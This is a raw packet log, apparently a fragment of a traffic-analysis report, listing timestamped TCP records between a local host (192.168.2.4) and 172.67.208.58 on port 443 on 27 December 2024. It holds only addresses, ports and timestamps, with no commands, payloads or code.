                                                                                                                                                                                            Dec 27, 2024 20:23:58.022126913 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.022222996 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.022233963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.022274971 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.166671038 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.166687965 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.166795969 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.166812897 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.166896105 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.174535036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.174551010 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.174621105 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.174631119 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.174684048 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.182528973 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.182544947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.182626963 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.182641029 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.182688951 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.189174891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.189189911 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.189264059 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.189274073 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.189323902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.196506023 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.196521044 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.196590900 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.196602106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.196643114 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.204550028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.204566956 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.204675913 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.204687119 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.204737902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.212249994 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.212270021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.212335110 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.212342978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.212387085 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.220194101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.220211029 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.220283031 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.220292091 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.220335960 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.359524965 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.359545946 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.359792948 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.359827995 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.359922886 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.366564989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.366580963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.366656065 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.366671085 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.366717100 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.374180079 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.374196053 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.374270916 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.374283075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.374325037 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.381939888 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.381958961 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.382034063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.382050991 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.382097006 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.389264107 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.389280081 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.389348984 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.389358997 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.389400959 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.397171974 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.397187948 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.397260904 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.397270918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.397313118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.404037952 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.404055119 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.404124022 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.404134035 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.404177904 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.411962032 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.411978006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.412045956 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.412058115 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.412105083 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.563081980 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.563100100 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.563236952 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.563267946 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.563321114 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.570121050 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.570139885 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.570207119 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.570219040 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.570261955 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.577927113 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.577943087 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.578023911 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.578037024 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.578083038 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.585661888 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.585676908 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.585731983 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.585741043 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.585782051 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.593137980 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.593153000 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.593224049 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.593234062 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.593277931 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.600989103 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.601007938 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.601080894 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.601090908 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.601136923 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.607697964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.607723951 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.607789040 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.607804060 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.607846975 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.615597010 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.615613937 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.615681887 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.615691900 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.615849018 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.634650946 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.756522894 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.756542921 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.756643057 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.756668091 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.756711960 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.764345884 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.764360905 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.764445066 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.764456034 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.764498949 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.769706964 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.769721985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.769808054 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.769819975 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.769861937 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.778023005 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.778038979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.778100967 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.778110027 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.778155088 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.784790039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.784804106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.784872055 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.784881115 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.784921885 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.792777061 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.792792082 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.792864084 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.792874098 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.792917013 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.800540924 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.800563097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.800616980 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.800632000 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.800671101 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.807368994 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.807384014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.807535887 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.807543993 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.807575941 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.807596922 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.817322969 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.947149992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.947166920 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.947226048 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.947238922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.947277069 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.947295904 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.954987049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.955028057 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.955111980 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.955122948 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.955161095 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.962150097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.962166071 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.962234020 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.962243080 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.962281942 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.969990015 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.970004082 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.970069885 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.970077991 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.970118999 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.977229118 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.977242947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.977293015 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.977302074 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.977341890 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.984889030 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.984904051 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.984980106 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.984988928 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.985028982 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.992801905 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.992816925 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.992878914 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.992888927 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.992928982 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.999674082 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.999691010 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.999783993 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.999794006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.999830008 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.131196022 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.139204979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.139221907 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.139282942 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.139297962 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.139337063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.147093058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.147109985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.147178888 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.147187948 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.147216082 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.147233009 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.153979063 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.153995037 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.154113054 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.154131889 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.154177904 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.161922932 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.161938906 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.162003040 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.162044048 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.162089109 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.169629097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.169646025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.169692993 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.169712067 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.169748068 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.169770002 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.176979065 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.176995993 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.177052975 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.177090883 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.177122116 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.177145004 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.184973001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.184989929 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.185039997 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.185060978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.185092926 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.185125113 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.191737890 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.191754103 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.191807032 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.191823959 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.191852093 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.191870928 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.222564936 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.331634998 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.331655025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.331780910 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.331828117 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.331892967 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.335923910 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.336007118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.336026907 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.342977047 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.342993975 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.343071938 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.343092918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.350651979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.350667953 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.350725889 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.350747108 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.350779057 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.358448029 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.358462095 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.358567953 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.358588934 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.365993977 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.366008997 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.366090059 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.366112947 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.373889923 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.373904943 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.373984098 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.374008894 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.380419970 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.380434990 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:59.380537033 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:59.380556107 CET44349747172.67.208.58192.168.2.4
